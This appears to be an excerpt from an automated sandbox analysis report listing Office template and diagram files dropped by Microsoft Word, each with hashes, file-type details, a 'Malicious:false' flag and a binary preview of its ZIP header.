                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8BA551EEC497947FC39D1D48EC868B54
                                                      SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                      SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                      SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8109B3C170E6C2C114164B8947F88AA1
                                                      SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                      SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                      SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                      SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                      SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                      SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                      SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                      SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                      SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:950F3AB11CB67CC651082FEBE523AF63
                                                      SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                      SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                      SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                      SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                      SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                      SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                      SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                      SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                      SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                      SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                      SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                      SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D32E93F7782B21785424AE2BEA62B387
                                                      SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                      SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                      SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                      SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                      SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                      SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CDC1493350011DB9892100E94D5592FE
                                                      SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                      SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                      SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                      SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                      SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                      SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                      SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                      SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                      SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:42A840DC06727E42D42C352703EC72AA
                                                      SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                      SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                      SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                      SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                      SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                      SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                      Malicious:false
                                                      Reputation:unknown
